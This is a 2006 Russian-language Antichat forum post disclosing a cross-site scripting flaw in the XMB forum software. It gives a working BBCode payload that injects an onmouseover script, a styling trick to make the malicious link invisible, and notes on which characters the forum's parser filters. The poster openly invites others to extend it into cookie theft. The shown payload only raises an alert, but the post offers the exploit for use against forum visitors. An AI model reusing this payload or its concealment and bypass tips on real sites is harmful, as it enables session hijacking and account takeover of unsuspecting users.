Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   XMB last ver. XSS (https://forum.antichat.xyz/showthread.php?t=24772)

Brahma 02.10.2006 15:41
XMB last ver. XSS
 
В последних XMB нашёл XSS, как нарыть куки с помощью этого дела - не сообразил, кто додумается - отпишитесь.
Собственно вот сам код (уберите знак *(звездочка) из тегов):
Код:
[url*][url*= onmouseover=a=String.fromCharCode(40,99,41,32,66,114,97,104,109,97);alert(a) style=`color:#fff;background:#fff;`][/url*][/url*]
Надеюсь вы заметили
Код:
style=`color:#fff;background:#fff;`
С помощью этой чтуки можно изменить стиль текста ссылки, тем самым замаскировать её.
Проверено на IE, Firefox, Opera (8.4) - всё прекрасно работает.
p.s. для тех, кто собирается рыть дальше в этой ХСС сразу скажу - форум не парсит бб теги, если в них присутствует: ' , ".
Парсит: < , >, &=&amp; , &nbsp;=&amp;nbsp;(ыыы)... и т.п.


Время: 13:48